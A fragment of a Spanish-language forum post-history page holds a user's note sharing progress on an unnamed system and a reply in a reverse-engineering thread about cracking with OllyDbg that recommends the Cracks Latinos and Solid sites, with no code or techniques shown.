Acá les dejo el avance del sistema, si alguien ve alguna falla antes de subirlo porfavor que me lo pueda decir.
todavía no está 100% terminado pero si operativo.
Una copia del código lo dejé acá:
http://foro.jccharry.com/index.php?topic=42.0
donde explico el fin de este archivo.
4320  Programación / Ingeniería Inversa / Re: Introducción al Cracking con OllyDbg desde cero en: 19 Noviembre 2007, 21:12 pm
Si, es un grán sitio al igual que  Cracks Latinos y Solid
http://crackslatinos.hispadominio.net/Solid/
http://crackslatinos.hispadominio.net/
Páginas: 1 ... 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 [432] 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 ... 456
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines